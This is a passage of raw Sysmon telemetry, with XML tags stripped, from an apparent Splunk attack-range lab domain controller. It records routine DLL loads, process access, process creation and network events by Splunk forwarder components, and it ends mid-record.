Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000099270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000099269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000099268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000099267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000099266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000099265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000099264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000099263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000099262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000099261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000099260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000099259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000099258Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000099257Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099256Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000099255Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000099254Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000099253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000099252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000099251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000099248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000099247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000099246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x800000000000000099243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099242Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000099241Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000099240Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099239Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exeMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2trueSplunk, Inc.Valid 10341000x800000000000000099238Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099237Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.881{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000099232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.882{326FD73D-C0EE-6294-390B-000000005502}1276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000099231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:43.136{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53332-false10.0.1.12-8000- 23542300x800000000000000099230Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.318{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 